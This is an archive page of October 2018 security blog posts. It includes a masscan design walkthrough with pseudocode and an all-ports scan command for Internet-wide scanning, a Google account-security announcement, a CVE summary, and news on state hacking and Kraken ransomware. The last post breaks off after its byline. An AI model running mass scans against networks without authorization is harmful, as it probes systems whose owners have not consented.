Monthly Archives: October 2018

Masscan and massive address lists

I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.

Both nmap and masscan are port scanners. The difference is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, up to and including the entire Internet (all IPv4 addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.

How masscan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little-used feature in nmap. But when you scan the entire Internet, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.

Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.

So the performance problem now isn't how to look up an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.

Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets per second: not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes its addresses, but the documentation implies that it does a block of addresses at a time, randomizes that block, and keeps state on which addresses it's scanned and which ones it hasn't.

The way masscan works is not to randomly pick an IP address so much as to randomize an index.

To start with, we create a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given an index:

    ip = pick(targets, index);

Where index is in the range [0..target_count).

This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).
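A minimal sketch of that binary search, with illustrative names and a hypothetical range structure (not masscan's actual code), might look like this:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical range entry: an inclusive [begin, end] span of IPv4
 * addresses, plus start_index, the count of addresses in all earlier
 * ranges in the sorted list. */
struct range {
    uint32_t begin;
    uint32_t end;
    uint64_t start_index;
};

/* Binary-search the sorted ranges for the one containing `index`,
 * then offset into that range. */
uint32_t pick(const struct range *targets, size_t count, uint64_t index)
{
    size_t lo = 0, hi = count;
    while (lo + 1 < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (targets[mid].start_index <= index)
            lo = mid;   /* the chosen range is at mid or later */
        else
            hi = mid;   /* the chosen range is before mid */
    }
    return targets[lo].begin + (uint32_t)(index - targets[lo].start_index);
}
```

The search costs O(log n) in the number of ranges, so picking stays cheap even after thousands of exclusions have been folded into the list.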

Given this system, we can now do an in-order (not randomized) port scan by doing the following:

    for (index=0; index<target_count; index++) {
        ip = pick(targets, index);
        scan(ip);
    }

Now, to scan in random order, we simply need to randomize the index variable.

    for (index=0; index<target_count; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx);
        scan(ip);
    }

The clever bit is in that shuffle function (here). It has to take an integer in the range [0..target_count) and return another pseudo-random integer in the same range. It has to be a function that does a one-to-one mapping. Again, we are stateless: we can't create a table of all addresses, randomize the order of the table, and then enumerate that table. We instead have to do it with an algorithm.

The basis of that algorithm, by the way, is DES, the Data Encryption Standard. That's how a block cipher works: it takes a 64-bit number (the block size for DES) and outputs another 64-bit block in a one-to-one mapping. In ECB mode, every block is encrypted to a unique other block. Two input blocks can't encrypt into the same output block, or you couldn't decrypt it.

The only problem is that the range isn't a neat 64-bit block, or any neat number of bits. It's an inconveniently sized number. The cryptographer Phillip Rogaway wrote a paper on how to change DES to support arbitrary integer ranges instead. The upshot is that it uses integer division instead of shifts, which makes it more expensive.

So the way we randomize the index variable is to encrypt it, where the encrypted number is still in the same range.
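As an illustration of the idea (a toy stand-in, not masscan's actual DES-based cipher), here is a shuffle() that runs a small Feistel cipher over the smallest power-of-two domain covering the range, then "cycle-walks" by re-encrypting until the output falls back inside the range. Because the Feistel network is invertible, this is a one-to-one mapping over an arbitrary-sized range, with no state beyond the seed:

```c
#include <assert.h>
#include <stdint.h>

/* Toy mixing function standing in for a real cipher round. */
static uint32_t round_fn(uint32_t x, uint32_t key)
{
    x = x * 2654435761u + key;  /* multiplicative hash plus round key */
    return x ^ (x >> 15);
}

/* One-to-one mapping of [0..range) onto itself: a 4-round Feistel
 * cipher over 2*half_bits bits, cycle-walked back into the range. */
uint64_t shuffle(uint64_t index, uint64_t range, uint32_t seed)
{
    /* smallest power-of-2 domain 2^(2*half_bits) covering the range */
    unsigned half_bits = 1;
    while (half_bits < 32 && (1ull << (2 * half_bits)) < range)
        half_bits++;
    uint64_t mask = (1ull << half_bits) - 1;

    uint64_t x = index;
    do {
        uint64_t left = x >> half_bits, right = x & mask;
        for (int round = 0; round < 4; round++) {
            uint64_t tmp = right;
            right = left ^ (round_fn((uint32_t)right, seed + round) & mask);
            left = tmp;
        }
        x = (left << half_bits) | right;
    } while (x >= range);   /* cycle-walk: re-encrypt until in range */
    return x;
}
```

Cycle-walking preserves the one-to-one property when the power-of-two domain is shrunk to the exact range; Rogaway's construction achieves the same end more directly, using integer division rather than bit splitting.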

Thus, the source of masscan's speed is the way it randomizes the IP addresses in a wholly stateless manner. It:
  • doesn't use any state, just enumerates an index over [0..target_count)
  • has a fast function that, given an index, retrieves the indexed IP address from a large list of ranges
  • has a fast function to randomize that index using the Power of Crypto
Given this as the base, there are lots of additional features we can add. For one thing, we are randomizing not only the IP addresses to scan, but also the ports. I think nmap picks the IP address first, then runs through a list of ports on that address. Masscan combines them together, so when scanning many ports on an address, they won't come as a burst in the middle of the scan, but will be spread evenly throughout the scan. It allows you to do things like:

    masscan -p0-65535

For this to work, we make the following change to the inner loop:

    range = port_count * target_count;
    for (index=0; index<range; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx % target_count);
        port = pick(ports, xXx / target_count);
        scan(ip, port);
    }

By the way, the compiler optimizes both the modulus and division operations into a single IDIV opcode on Intel x86, since that's how that instruction works, returning both results at once. Which is cool.

Another change we can make is sharding, spreading the scan across several CPUs or several servers. Let's say this is server #3 out of 7 servers sharing the load of the scan:

    for (index=shard; index<range; index += shard_count) {

Again, notice how we don't keep track of any state here, it's just a minor tweak to the loop, and now *poof* the sharding feature appears out of nowhere. It takes vastly more instructions to parse the configuration parameter (masscan --shard 3/7 ...) than it takes to actually do it.

Let's say that we want to pause and resume the scan. What state information do we need to save? The answer is just the index variable. Well, we also need the list of IP addresses that we are scanning. A limitation of this approach is that we cannot easily pause a scan and change the list of IP addresses.
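A sketch of what saving and restoring that state could look like (hypothetical file format and function names, not masscan's actual resume-file handling) might be as simple as:

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Write the only perishable state: the current index. In practice the
 * target list and the random seed must also be identical between runs,
 * or the resumed enumeration won't line up with the paused one. */
int save_state(const char *path, uint64_t index)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fprintf(f, "index = %llu\n", (unsigned long long)index);
    fclose(f);
    return 0;
}

/* Read the index back; returns 0 on success, -1 on failure. */
int load_state(const char *path, uint64_t *index)
{
    unsigned long long value = 0;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    int ok = fscanf(f, "index = %llu", &value);
    fclose(f);
    if (ok != 1) return -1;
    *index = value;
    return 0;
}
```

On resume, the loop simply starts at the saved index instead of zero; nothing else needs to be reconstructed.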


The upshot here is that we've twisted the nature of the problem. By using a crypto function to algorithmically create a one-to-one mapping for the index variable, we can just linearly enumerate a scan -- but magically in random order. This avoids keeping state. It avoids having to lookup addresses in an exclude list. And we get other features that naturally fall out of the process.

What about IPv6?

You'll notice I'm talking only about IPv4, and masscan supports only IPv4. The maximum-sized scan right now is 48 bits (a 16-bit port number plus a 32-bit IPv4 address). Won't larger scans mean using 256-bit integers?

When I get around to adding IPv6, I'll still keep a 64-bit index. The index variable is the number of things you are going to probe, and you can't scan a 64-bit space right now. You won't scan the entire IPv6 128-bit address space, but a lot of smaller address spaces that add up to less than 64 bits. So when I get around to adding IPv6, the concept will still work.

Announcing some security treats to protect you from attackers’ tricks

It’s Halloween 🎃 and the last day of Cybersecurity Awareness Month 🔐, so we’re celebrating these occasions with security improvements across your account journey: before you sign in, as soon as you’ve entered your account, when you share information with other apps and sites, and the rare event in which your account is compromised.

We’re constantly protecting your information from attackers’ tricks, and with these new protections and tools, we hope you can spend your Halloween worrying about zombies, witches, and your candy loot—not the security of your account.

Protecting you before you even sign in
Everyone does their best to keep their username and password safe, but sometimes bad actors may still get them through phishing or other tricks. Even when this happens, we will still protect you with safeguards that kick in before you are signed into your account.

When your username and password are entered on Google’s sign-in page, we’ll run a risk assessment and only allow the sign-in if nothing looks suspicious. We’re always working to improve this analysis, and we’ll now require that JavaScript is enabled on the Google sign-in page, without which we can’t run this assessment.

Chances are, JavaScript is already enabled in your browser; it helps power lots of the websites people use every day. But, because it may save bandwidth or help pages load more quickly, a tiny minority of our users (0.1%) choose to keep it off. This might make sense if you are reading static content, but we recommend that you keep JavaScript on while signing into your Google Account so we can better protect you. You can read more about how to enable JavaScript here.

Keeping your Google Account secure while you’re signed in

Last year, we launched a major update to the Security Checkup that upgraded it from the same checklist for everyone, to a smarter tool that automatically provides personalized guidance for improving the security of your Google Account.

We’re adding to this advice all the time. Most recently, we introduced better protection against harmful apps based on recommendations from Google Play Protect, as well as the ability to remove your account from any devices you no longer use.
More notifications when you share your account data with apps and sites

It’s really important that you understand the information that has been shared with apps or sites so that we can keep you safe. We already notify you when you’ve granted access to sensitive information — like Gmail data or your Google Contacts — to third-party sites or apps, and in the next few weeks, we’ll expand this to notify you whenever you share any data from your Google Account. You can always see which apps have access to your data in the Security Checkup.

Helping you get back to the beginning if you run into trouble

In the rare event that your account is compromised, our priority is to help get you back to safety as quickly as possible. We’ve introduced a new, step-by-step process within your Google Account that we will automatically trigger if we detect potential unauthorized activity.

We'll help you:
  • Verify critical security settings to help ensure your account isn’t vulnerable to additional attacks and that someone can’t access it via other means, like a recovery phone number or email address.
  • Secure your other accounts because your Google Account might be a gateway to accounts on other services and a hijacking can leave those vulnerable as well.
  • Check financial activity to see if any payment methods connected to your account, like a credit card or Google Pay, were abused.
  • Review content and files to see if any of your Gmail or Drive data was accessed or mis-used.
Online security can sometimes feel like walking through a haunted house—scary, and you aren't quite sure what may pop up. We are constantly working to strengthen our automatic protections to stop attackers and keep you safe from the many tricks you may encounter. During Cybersecurity Month, and beyond, we've got your back.

CVE-2018-14661 (glusterfs)

It was found that usage of the snprintf function in the feature/locks translator of glusterfs server 3.8.4, as shipped with Red Hat Gluster Storage, was vulnerable to a format string attack. A remote, authenticated attacker could use this flaw to cause a remote denial of service.

NIST’s Creation of a Privacy Framework

On Tuesday, Oct. 16, the National Institute of Standards and Technology (NIST) held its “Kicking off the NIST Privacy Framework: Workshop #1” in Austin, Texas. I was honored to be asked to participate. This was the first in a series of public workshops focusing on the development of a useful and voluntary Privacy Framework, like the NIST Cybersecurity Framework (CSF).

Event participation was outstanding. NIST’s initial registration for the event was filled in less than 90 minutes. Realizing they needed a bigger room, NIST moved to a space that nearly doubled the potential attendance. When the reopening of the registration was announced, it was filled in less than an hour. Many well-known names in the privacy field attended, with the audience primarily consisting of privacy consultants, lawyers, and other professionals trying to figure out how the Privacy Framework fits into their future.

NIST previously brought together both public and private sector individuals interested in solving problems that face us all. The CSF was a highly successful effort to develop a lightweight, valuable, and adoptable framework focused on improving the “security programs” of organizations. While initially developed in response to presidential executive order 13636, the CSF was never meant to be a government document. Speaking to critical infrastructure and cybersecurity organization representatives at the first Cybersecurity Framework meeting, previous NIST director Dr. Pat Gallagher said, “This is not NIST’s framework, this is yours.” He was absolutely right.

Over the next year, more than 3,000 professionals participated in CSF workshops, responded to requests for information, and provided comments on work-in-progress drafts. The result was something that achieved the CSF’s initial goals: It’s beneficial to all sectors and is usable by a range of organizations from small businesses to some of the largest corporations on the planet. The CSF is having a positive global influence with its adoption by various countries. It’s also assisting in the global alignment of cybersecurity languages and practices.

NIST has established many of the same goals for the Privacy Framework. These goals include:

  1. Developing the Privacy Framework through a consensus-driven, open, and highly transparent process
  2. Establishing a common language, providing for a consistent means to facilitate communication across all aspects of an organization
  3. Ensuring it is adaptable and scalable to many differing types of organizations, technologies, lifecycle phases, sectors, and uses
  4. Developing a voluntary, risk-based, outcome-based, and non-prescriptive privacy framework
  5. Ensuring it is usable as part of any organization’s broader corporate risk management strategy and processes
  6. Taking advantage of and incorporating existing privacy standards, methodologies, and guidance
  7. Establishing it as a living document that is updated as technology and approaches to privacy change and as stakeholders learn from implementations

During the Privacy Framework Kickoff, I was pleased to hear questions that were similar to what I heard during the initial CSF Kickoff. There was real tension in the room during the CSF Kickoff—a sense of not knowing how it was going to impact organizations’ cybersecurity-related responsibilities. The same tension was present during the Privacy Framework Kickoff conversations. We are just beginning to try to understand a solution that doesn’t yet exist.

It’s hard to see the result of a Privacy Framework from where we sit today. How can we develop and position a framework like this to be valuable for both U.S. and global businesses? What is intended for this effort? What are potential definition needs? What is harm? What new technology could influence this? How do we position this for the next 25 years of privacy, not just the past five?

We have started down a path that will likely take more than a year to complete. I envision the emerging Privacy Framework as addressing best practices in privacy while being compatible with and supporting an organization’s ability to operate under the various domestic and international legal or regulatory regimes. The Privacy Framework should not be focused on the legal aspects of privacy, but rather on what organizations need to consider in their own privacy programs. This is a journey just begun. From my perspective, the workshop on Oct. 16 was an outstanding start to the development of a consensus-driven Privacy Framework. I look forward to the active discussions and work ahead.

The post NIST’s Creation of a Privacy Framework appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, cyber threats and cyber attack accusations against Russia are very much centre stage of the UK government's international political agenda at the moment. The government publicly accused Russia's 'GRU' military intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group. The NCSC said GRU hackers, operating under a dozen different names including Fancy Bear (APT28), had targeted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported cyber security incidents, and another report, by law firm RPC, said average ICO fines had doubled and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as the airline disclosed a second attack, which occurred on 5th September 2018, when the payment page had 22 lines of malicious JavaScript code injected in an attack widely attributed to Magecart. Another airline, Cathay Pacific, also disclosed it had suffered a major data breach that impacted 9.4 million customers' personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014. Morrisons said it would now appeal to the Supreme Court. If that appeal fails, those affected will be able to claim compensation for "upset and distress".

There was an interesting article on Bloomberg, "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. That didn't stop ex-Security Minister Admiral Lord West calling out the Chinese, saying Chinese IT kit 'is putting all of us at risk' if used in 5G. He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua. BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating that a Chinese espionage group known as APT10 is attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google are finally pulling the plug on Google+ after user personal data was left exposed. Google and the other three major web browser providers said, in what seem like coordinated announcements, that businesses must accept TLS versions 1.0 and 1.1 will no longer be supported after Q1 2020.

So it's time to move over to the more secure TLS v1.2, or the even more secure and efficient TLS v1.3.


10 Cyber Security Travel Tips to Protect Your Devices & Data

Cyber Security Travel Tips for Business & Leisure The holiday season is fast approaching, but hackers don’t take vacations. Whether you’re planning to go home for the holidays or travel for business on a regular basis, make sure to protect yourself from cyber crime with these cyber security travel tips. Cyber Security Travel Tip #1:… Read More


US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of whom are intelligence officers -- with hacking into and stealing intellectual property from a pair of unnamed US and French companies from January 2015 to at least May of 2015. The hackers were after a type of turbofan (a portmanteau of turbine and fan), a large commercial airline engine, either to circumvent development costs or to avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on a comparable engine. The hack afflicted unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZDNet

Source: US Department of Justice

Building a Multi-cloud Logging Strategy: Issues and Pitfalls

Posted under: Heavy Research

As we begin our series on Multi-cloud logging, we start with reasons some traditional logging approaches don’t work. I don’t like to start with a negative tone, but we need to point out some challenges and pitfalls which often beset firms on first migration to cloud. That, and it helps frame our other recommendations later in this series. Let’s take a look at some common issues by category.


  • Scale & Performance: Most log management and SIEM platforms were designed and first sold before anyone had heard of clouds, Kafka, or containers. They were architected for ‘hub-and-spoke’ deployments on flat networks, when ‘Scalability’ meant running on a bigger server. This is important because the infrastructure we now monitor is agile – designed to auto-scale up when we need processing power, and back down to reduce costs. The ability to scale up, down, and out is essential to the cloud, but often missing from older logging products which require manual setup, lacking full API enablement and auto-scale capability.
  • Data Sources: We mentioned in our introduction that some common network log sources are unavailable in the cloud. Contrariwise, as automation and orchestration of cloud resources happen via API calls, API logs become an important source. Data formats for these new log sources may change, as do the indicators used to group events or users within logs. For example, servers in auto-scale groups may share a common IP address. But functions and other ‘serverless’ infrastructure are ephemeral, making it impossible to differentiate one instance from the next this way. So your tools need to ingest new types of logs, faster, and change their threat detection methods by source.
  • Identity: Understanding who did what requires understanding identity. An identity may be a person, service, or device. Regardless, the need to map it, and perhaps correlate it across sources, becomes even more important in hybrid and multi-cloud environments.
  • Volume: When SIEM first began making the rounds, there were only so many security tools, and they were pumping out only so many logs. Between new security niches and new regulations, the array of log sources sending unprecedented amounts of logs to collect and analyze grows every year. Moving from traditional AV to EPP, for example, brings with it a huge log volume increase. Add in EDR logs and you’re really into some serious volumes. On the server side, moving from network and server logs to add application-layer and container logs brings a non-trivial increase in volume. There are only so many tools designed to handle modern event rates (X billion events per day) and volumes (Y terabytes per day) without buckling under the load, and more importantly, there are only so many people who know how to deploy and operate them in production. While storage is plentiful and cheap in the cloud, you still need to get those logs to the desired storage from various on-premise and cloud sources – perhaps across IaaS, PaaS, and SaaS. If you think that’s easy, call your SaaS vendor and ask how to export all your logs from their cloud into your preferred log store (S3/ADLS/GCS/etc.). That old saw from Silicon Valley, “But does it scale?” is funny but really applies in some cases.
  • Bandwidth: While we’re on the topic of ridiculous volumes, let’s discuss bandwidth. Network bandwidth and transport layer security between on-premise and cloud and inter-cloud is non-trivial. There are financial costs, as well as engineering and operational considerations. If you don’t believe me ask your AWS or Azure sales person how to move, say, 10 terabytes a day between those two. In some cases architecture only allows a certain amount of bandwidth for log movement and transport, so consider this when planning migrations and add-ons.


  • Multi-account Multi-cloud Architectures: Cloud security facilitates things like micro-segmentation, multi-account strategies, closing down all unnecessary network access, and even running different workloads in different cloud environments. This sort of segmentation makes it much more difficult for attackers to pivot if they gain a foothold. It also means you will need to consider which cloud native logs are available, what you need to supplement with other tooling, and how you will stitch all these sources together. Expecting to dump all your events into a syslog style service and let it percolate back on-premise is unrealistic. You need new architectures for log capture, filtering, and analysis. Storage is the easy part.
  • Monitoring “up the Stack”: As cloud providers manage infrastructure, and possibly applications as well, your threat detection focus must shift from networks to applications. This is both because you lack visibility into network operations and because cloud network deployments are generally more secure, prompting attackers to shift focus. Even if you’re used to monitoring the app layer from a security perspective, for example with a big WAF in front of your on-premise servers, do you know whether your vendor has a viable cloud offering? If you’re lucky enough to have one that works in both places, and you can deploy in cloud as well, answer this (before you initiate the project): Where will those logs go, and how will you get them there?
  • Storage vs. Ingestion: Data storage in cloud services, especially object storage, is so cheap it is practically free. And long-term data archival cloud services offer huge cost advantages over older on-premise solutions. In essence we are encouraged to store more. But while storage is cheap, it’s not always cheap to ingest more data into the cloud, because some logging and analytics services charge based upon volume (gigabytes) and event rates (number of events) ingested into the tool/service/platform. Examples are Splunk, Azure Event Hubs, AWS Kinesis, and Google Stackdriver. Many log sources for the cloud are verbose – in both the number of events and the amount of data generated from each. So you will need to architect your solution to be economically efficient, as well as negotiate with your vendors over ingestion of noisy sources such as DNS and proxies. A brief side note on ‘closed’ logging pipelines: Some vendors want to own your logging pipeline on top of your analytics toolset. This may sound convenient because it “just works” (mostly for their business model), but beware lock-in, both from cost overruns caused by the inability to deduplicate or filter pre-ingestion (the meter catches every event), and from the opportunity cost of lost analytical capabilities other tools could provide – but not if you can’t feed them a copy of your log stream. The fact that you can afford to move a bunch of logs from place to place doesn’t mean it’s easy. Some logging architectures are not conducive to sending logs to more than one place at a time, and once you are in their system, exporting all logs (not just alerts) to another analytical tool can be incredibly difficult and resource intensive, because events can be ‘cooked’ into their own proprietary format, which you then have to reverse during export to make sense for other analytical tools.


  • What to Filter and When: Compliance, regulatory, and contractual commitments prompt organizations to log everything and store it all forever (OK, not quite, but just about). And not just in production, but in pre-production, development, and test systems. Combine that with overly chatty cloud logging systems (what do you plan to do with logs of every single API call into and inside your entire cloud?), and you are quickly overloaded. This results in both slower processing and higher costs. Dealing with this problem combines deciding what must be kept vs. filtered; what needs to be analyzed vs. captured for posterity; and what is relevant today for security analysis and model building, vs. irrelevant tomorrow. One of the decision points you’ll want to address early is what data you consider perishable/real-time vs. historical/latency-tolerant.
  • Speed: For several years there has been a movement away from batch processing, and moving to real-time analysis (footnote: batch can be very slow [days] or very fast [micro-batching within 1-2 second windows], so we use ‘batch’ to mean anything not real-time, more like daily or less frequent). Batch mode, as well as normalization and storage prior to analysis, is becoming antiquated. The use of stream processing infrastructure, machine learning, and “stateless security” enable and even facilitate analysis of events as they are received. Changing the process to analyze in real time is needed to keep pace with attackers and fully automated attacks.
  • Automated Response: Many large corporations and government agencies suffered tremendously in 2017 from fast-spreading ‘ransomworms’ (also called ‘nukeware’) such as WannaCry and NotPetya. Response models tuned for stealthy low-and-slow IP and PII exfiltration attacks need revisiting. Once fast-movers execute, you cannot detect your way past the grenades they leave in your datacenter. They are very obvious and very loud. The good news is that the cloud model inherently enables micro-segmentation and automated response. The cloud also doesn’t rely on ancient identity and network protocols which enable lateral movement and continue to plague even the best on-premise security shops. Don’t forget that bad practices in the cloud won’t save you from even untargeted shenanigans. Remember the MongoDB massacre of January 2017? Fast response to things that look wrong is key to dropping the net on the bad guys as they try to pwn you. Knowing exactly what you have, its known-good state, and how to leverage new cloud capabilities are all advantages the blue team needs to leverage.

Again, our point is not to bash older products, but to point out that cloud environments demand you re-think how you use tools and revisit your deployment models. Most can work with re-engineered deployment. We generally prefer to deploy known technologies when appropriate, which helps reduce the skills gap facing most security and IT teams. But in some cases you will find new and different ways to supplement existing logging infrastructure, and likely run multiple analysis capabilities in parallel.

Next up in our series: Multi-cloud logging architectures and design.

-Adrian & Gal


Risky Business #520 — Tanya Janca talks security in the curriculum

We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago, so now they have some decent telemetry. I wanted to ask Ferruh what he’s found surprising now that he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was. He knew it was bad, he says, but he didn’t know it was this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

  • More Chinese MSS officers indicted by the US DoJ
  • ASD chief speaks publicly on 5G Huawei ban
  • China playing funny buggers with BGP
  • Russia is still messing with the US during the midterms
  • Facebook boots more Iranian influence pages
  • New privacy features in Signal
  • Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice
U.S. charges Chinese intelligence officers for jet engine data hack
Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation)
Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register
US bans exports to Chinese DRAM maker citing national security risk | ZDNet
China has been 'hijacking the vital internet backbone of western countries' | ZDNet
Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It.
The Crisis of Election Security - The New York Times
DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet
Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet
We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News
NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica
North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet
New Signal privacy feature removes sender ID from metadata | Ars Technica
Windows Defender becomes first antivirus to run inside a sandbox | ZDNet
Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet
Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet
Twelve malicious Python libraries found and removed from PyPI | ZDNet
How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard
Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard
Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED
Microsoft Windows zero-day disclosed on Twitter, again | ZDNet
Digital DASH – ICTC - Focus on Information Technology (FIT)

Kraken Ransomware Emerges from the Depths: How to Tame the Beast

Look out, someone has released the Kraken — or at least a ransomware strain named after it. Kraken Cryptor ransomware first made its appearance back in August, but in mid-September the malicious beast emerged from the depths disguised as the legitimate antispyware application SuperAntiSpyware. In fact, the attackers behind the ransomware were able to access the website and distribute the ransomware from there.

So how did this stealthy monster recently gain more traction? The McAfee Advanced Threat Research team, along with the Insikt group from Recorded Future, decided to uncover the mystery. They soon found that the Fallout Exploit kit, a type of toolkit cybercriminals use to take advantage of system vulnerabilities, started delivering Kraken ransomware at the end of September. In fact, this is the same exploit kit used to deliver GandCrab ransomware. With this new partnership between Kraken and Fallout, Kraken now has an extra vessel to employ its malicious tactics.

Now, let’s discuss how Kraken ransomware works to encrypt a victim’s computer. Kraken utilizes a business scheme called Ransomware-as-a-Service, or RaaS, which is a platform tool distributed by hackers to other hackers. This tool gives cybercriminals the ability to hold a victim’s computer files, information, and systems hostage. Once the victim pays the ransom, the hacker sends a percentage of the payment to the RaaS developers in exchange for a decryption code to be forwarded to the victim. However, Kraken wipes files from a computer using external tools, making data recovery nearly impossible for the victim. Essentially, it’s a wiper.

Kraken Cryptor ransomware employs a variety of tactics to avoid detection by many antimalware products. For example, hackers are given a new variant of Kraken every 15 days to help it slip under an antimalware solution’s radar. The ransomware also uses an exclusion list, a common method utilized by cybercriminals to avoid prosecution. The exclusion list names all countries where Kraken cannot be used, suggesting that the cybercriminals behind the ransomware attacks reside in those countries. As you can see, Kraken goes to great lengths to cover its tracks, making it a difficult cyberthreat to fight.

Kraken’s goal is to encourage more wannabe cybercriminals to purchase this RaaS and conduct their own attacks, ultimately leading to more money in the developers’ pockets. Our research team observed that in Version 2 of Kraken, the developers decreased their profit percentage from 25% to 20%, probably as a tactic to attract more affiliate hackers. The more criminal customers Kraken can onboard, the more attacks they can carry out, and the more they can profit from ransom collections.

So, what can users do to defend themselves from this stealthy monstrosity? Here are some proactive steps you can take:

  • Be wary of suspicious emails or pop-ups. Kraken was able to gain access to a legitimate website and other ransomware can too. If you receive a message or pop-up claiming to be from a company you trust but the content seems fishy, don’t click on it. Go directly to the source and contact the company from their customer support line.
  • Back up your files often. With cybercrime on the rise, it’s vital to consistently back up all of your important data. If your device becomes infected with ransomware, there’s no guarantee that you’ll get it back. Stay prepared and protected by backing up your files on an external hard drive or in the cloud.
  • Never pay the ransom. Although you may feel desperate to get your data back, paying does not guarantee that all of your information will be returned to you. Paying the ransom also contributes to the development of more ransomware families, so it’s best to just hold off on making any payments.
  • Use a decryption tool. No More Ransom provides tools to help users free their encrypted data. If your device gets held for ransom, check and see if a decryption tool is available for your specific strain of ransomware.
  • Use a comprehensive security solution. Add an extra layer of security on to all your devices by using a solution such as McAfee Total Protection, which now includes ransom guard and will help you better protect against these types of threats.

Want to learn more about Ransomware and how to defend against it? Visit our dedicated ransomware page.


The post Kraken Ransomware Emerges from the Depths: How to Tame the Beast appeared first on McAfee Blogs.

Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims

Alexandr Solad and Daniel Hatheway of Recorded Future are coauthors of this post. Read Recorded Future’s version of this analysis. 

